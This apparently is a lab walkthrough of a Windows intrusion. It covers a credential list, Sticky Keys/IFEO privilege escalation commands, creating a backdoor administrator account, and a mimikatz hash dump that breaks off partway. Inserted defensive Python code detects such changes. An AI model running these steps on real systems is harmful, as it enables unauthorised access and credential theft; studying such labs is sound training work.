XR-0998 | liuyun | CB7sxbk84I
XR-0999 | wangkun | KuJH519OWg
XR-01000 | chenmin | e4gQGHorq3
XR-01001 | liqin | 4zEJkYPIpq
XR-01002 | wangfang | FTVYd4W02u
XR-01003 | liuhua | P9ndfu8wGh
XR-01004 | zhangqin | 0f1JTN5Qqp
XR-01005 | zhanglong | nH8mDpRbcN
XR-01006 | zhangjie | cTVwM25y3h
XR-01007 | liliang | Rf6zXV0YEI
XR-01008 | liyun | 3hxTmEoMBl
XR-01009 | wangcheng | Boy4Ezp987
XR-01010 | yangjing | gjhbXHcLW0
XR-01011 | chenying | koGFcPeBmi
XR-01012 | lihua | nSOjeYV3Nr
XR-01013 | liumei | yxAm2nWNp9
XR-01014 | yangjuan | Gpe6Au2hxF
XR-01015 | lidan | ogDLzMhCVP
XR-01016 | liyang | nDWvGhNMoe
XR-01017 | zhaojun | XtfZYOxeDJ

From the earlier internal reconnaissance: 172.22.14.46 is XIAORANG\XR-0923, an IIS Windows Server.

Look up the matching credentials:

The account belongs to the Remote Desktop Users and Remote Management Users groups, so it can connect over both RDP and WinRM.

XR-0923 | zhangshuai | wSbEajHzZs

Connect remotely and check what privileges the account holds:

whoami /priv

Over an RDP session, a normal cmd window does not show SeRestorePrivilege by default; you need to right-click and Run as administrator.

But connecting with evil-winrm shows the relevant privileges directly:

C:\Windows\system32>whoami /priv

特权信息
----------------------

特权名 描述 状态
============================= ============== ======
SeRestorePrivilege 还原文件和目录 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用

With SeRestorePrivilege, files and registry keys can be modified regardless of their ACLs, much like the magnifier (magnify.exe) escalation from an earlier lab.
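The point that trips people up in the whoami output above is that SeRestorePrivilege shows as 已禁用 (Disabled) and still matters: a process can enable any privilege that is present in its token, so the State column only describes the current state. As an added example that is not part of the writeup, here is a small Python triage of `whoami /priv` output that flags high-impact privileges regardless of state and normalises the localised State column; the privilege table, the locale word map and the two constructed samples (the zh-CN output quoted above plus an en-US equivalent) are my own.

```python
# Privileges a process can switch on for itself with AdjustTokenPrivileges, so
# "Disabled" in whoami /priv does not mean unusable. Descriptions are my summary.
HIGH_IMPACT = {
    "SeRestorePrivilege": "write files and registry keys regardless of ACL",
    "SeBackupPrivilege": "read files and registry keys regardless of ACL",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeAssignPrimaryTokenPrivilege": "assign primary tokens to processes",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# whoami localises the State column; map the variants we know to one spelling.
STATE_WORDS = {"enabled": "Enabled", "disabled": "Disabled",
               "已启用": "Enabled", "已禁用": "Disabled"}

def parse_privs(text):
    """{privilege name: normalised state} from whoami /priv output in any locale."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with the privilege constant (Se...Privilege); the
        # description in between may contain spaces, the state is the last token.
        if len(parts) < 2 or not (parts[0].startswith("Se") and parts[0].endswith("Privilege")):
            continue
        privs[parts[0]] = STATE_WORDS.get(parts[-1].lower(), parts[-1])
    return privs

def triage(text):
    """(name, state, why it matters) for every high-impact privilege in the token."""
    return [(name, state, HIGH_IMPACT[name])
            for name, state in parse_privs(text).items() if name in HIGH_IMPACT]

# Constructed sample 1: the zh-CN output from the writeup.
SAMPLE_ZH = """\
特权信息
----------------------

特权名 描述 状态
============================= ============== ======
SeRestorePrivilege 还原文件和目录 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
"""

# Constructed sample 2: the same token as en-US whoami would print it.
SAMPLE_EN = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeRestorePrivilege            Restore files and directories  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

if __name__ == "__main__":
    for name, state, why in triage(SAMPLE_ZH):
        print(f"{name:32} {state:9} {why}")
```

Run over a user's `whoami /priv` output (in either locale) it reports SeRestorePrivilege as the one finding here; SeChangeNotifyPrivilege and SeIncreaseWorkingSetPrivilege are granted to every user and are ignored. The same table is what a defender would audit on the group-policy side: a standard user holding SeRestorePrivilege or SeBackupPrivilege is effectively a local administrator.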

cmd.exe can be renamed to sethc.exe; pressing Shift five times on the lock screen then launches sethc (Sticky Keys) as SYSTEM to escalate privileges.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"
rename sethc.exe sethc.bak
rename cmd.exe sethc.exe

Over RDP both operations return Access Denied, oddly; switch to evil-winrm instead:

proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
cd C:\windows\system32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

Then lock the screen and press Shift five times to trigger Sticky Keys.
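Both variants of the Sticky Keys trick used above leave a simple artefact: either an Image File Execution Options Debugger value on an accessibility binary, or a sethc.exe whose hash no longer matches the original (and, after a rename, matches cmd.exe instead). As an added example that is not part of the writeup, here is a Python check for both, meant to be run against a `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` export and a hash inventory of System32. The list of accessibility binaries, the parsing of `reg query` output and the constructed sample (the registry export and the placeholder hash values) are my own assumptions.

```python
import re

# Accessibility helpers that the logon screen launches as SYSTEM; these are the
# binaries an IFEO Debugger hijack or a binary swap targets (my list, not exhaustive).
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}

def parse_reg_query(text):
    """{key path: {value name: (type, data)}} from `reg query ... /s` output."""
    keys, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("HKEY_"):
            current = raw.strip()
            keys[current] = {}
        elif current and raw.startswith(" "):
            # Value rows are "    Name    REG_TYPE    Data"; data may contain spaces.
            parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
            if len(parts) == 3:
                keys[current][parts[0]] = (parts[1], parts[2])
    return keys

def find_ifeo_hijacks(text):
    """(binary, debugger path) for every accessibility binary with an IFEO Debugger value."""
    findings = []
    for key, values in parse_reg_query(text).items():
        head, _, leaf = key.rpartition("\\")
        if not head.lower().endswith("image file execution options"):
            continue
        lowered = {name.lower(): data for name, (_, data) in values.items()}
        if leaf.lower() in ACCESSIBILITY_BINARIES and "debugger" in lowered:
            findings.append((leaf.lower(), lowered["debugger"]))
    return findings

def find_swapped_binaries(observed, expected):
    """(binary, what its hash actually matches) for accessibility binaries whose
    observed hash differs from the expected one. A renamed cmd.exe shows up as
    sethc.exe carrying cmd.exe's hash."""
    by_hash = {h: name for name, h in expected.items()}
    findings = []
    for name in sorted(ACCESSIBILITY_BINARIES):
        h = observed.get(name)
        if h is None or h == expected.get(name):
            continue
        findings.append((name, by_hash.get(h, "unknown binary")))
    return findings

# Constructed sample registry export: one benign IFEO subkey and one hijack.
SAMPLE_REG = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DllNXOptions
    mscorwks.dll    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe
    Debugger    REG_SZ    C:\\Windows\\System32\\cmd.exe
"""

# Constructed placeholder hashes (not real file hashes): a golden inventory of the
# build and what is currently on disk after "ren cmd.exe sethc.exe".
EXPECTED = {"cmd.exe": "sha256:cmd-placeholder", "sethc.exe": "sha256:sethc-placeholder",
            "utilman.exe": "sha256:utilman-placeholder"}
OBSERVED = {"sethc.exe": "sha256:cmd-placeholder", "utilman.exe": "sha256:utilman-placeholder"}

if __name__ == "__main__":
    print("IFEO hijacks:", find_ifeo_hijacks(SAMPLE_REG))
    print("swapped binaries:", find_swapped_binaries(OBSERVED, EXPECTED))
```

For the hash side, the expected values would come from a clean reference host of the same build; in practice the comparison is cheaper to express as "sethc.exe's hash equals some other binary's hash", which is exactly what the rename leaves behind.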

Add a high-privilege account, log in, and look for the flag:

net user hey qwer1234! /add
net localgroup administrators hey /add

Extracting the SAM via volume shadow copy

mimikatz

privilege::debug
sekurlsa::logonpasswords
Authentication Id : 0 ; 15495241 (00000000:00ec7049)
Session : RemoteInteractive from 3
User Name : hey
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2024/3/6 22:05:27
SID : S-1-5-21-754105099-1176710061-2177073800-1002
msv :
[00000003] Primary
* Username : hey
* Domain : XR-0923
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : hey
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : hey
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 12552457 (00000000:00bf8909)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2024/3/6 21:43:58
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : wSbEajHzZs
ssp :
credman :
cloudap :

Authentication Id : 0 ; 12511753 (00000000:00beea09)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/6 21:43:57
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 12510911 (00000000:00bee6bf)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/3/6 21:43:57
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 5898003 (00000000:0059ff13)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2024/3/6 20:16:58
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 65754 (00000000:000100da)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/6 19:11:07
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 8519c5a89b2cd4d679a5a36f26863e5d
* SHA1 : 42d8188bc30ff0880b838e368c6e5522b86f978d
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
ssp :
credman :
cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XR-0923$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/3/6 19:11:07
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-0923$
* Domain : XIAORANG.LAB
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 34168 (00000000:00008578)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/3/6 19:11:07
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 15495212 (00000000:00ec702c)
Session : RemoteInteractive from 3
User Name : hey
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2024/3/6 22:05:27
SID : S-1-5-21-754105099-1176710061-2177073800-1002
msv :
[00000003] Primary
* Username : hey
* Domain : XR-0923
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : hey
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : hey
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 15481645 (00000000:00ec3b2d)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/6 22:05:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 15480336 (00000000:00ec3610)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/6 22:05:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 15479707 (00000000:00ec339b)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/3/6 22:05:26
SID : S-1-5-96-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 13418036 (00000000:00ccbe34)
Session : Interactive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2024/3/6 21:47:27
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 12552486 (00000000:00bf8926)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2024/3/6 21:43:58
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 12512498 (00000000:00beecf2)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/6 21:43:57
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 14 fb 2a 66 28 bd e0 da 9e 3c b3 8a f7 56 13 4f b3 0b e7 6e d1 d5 28 9b 19 78 83 01 e1 a2 04 59 54 94 1a 8e aa ee 3b ff 1b a5 2d 00 f5 5a 16 c4 8d 67 4e 22 96 6c fb e5 c1 b6 ba e5 e4 92 d0 f6 ff ad ca f6 9e 19 02 1b 13 30 f7 ec a0 e8 41 37 31 22 43 30 7f 3a 8d cf e6 7c 7c fc a7 5e 72 5c 23 cd bd 17 96 4e 92 9a 91 b1 ae c4 c3 1e 9e a2 70 63 b2 49 77 4e 0c 00 8b b6 df fc df 2d cb 75 b4 67 6f b8 38 c5 96 c4 f9 d3 41 f5 a3 35 19 7c da 0b 23 e4 e9 31 75 79 8f ad 30 80 fb 83 3d f7 c4 b9 12 5b 4e 49 30 f5 9a 17 0d 62 c0 0f 7f 0e 7a 75 17 2d ec a8 7a 94 6d 3e a2 a6 94 47 a7 16 3d 3d 01 ca d1 fa 8d 0b 62 ce 1e 66 3b b8 1d d1 66 25 94 e4 f1 92 d4 e1 9b f1 8c 86 4d af 3e c7 bd 45 ac 28 a6 f6 d4 2f fe b3 cd 55 10 69 01 b0
ssp :
credman :
cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/3/6 19:11:09
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/3/6 19:11:07
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 65727 (00000000:000100bf)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/6 19:11:07
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 3eee7b38a7eeb8b5c4bc080c71fa8916
* SHA1 : 17b47db237ad24125f2f8782d40c186c812612d6
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
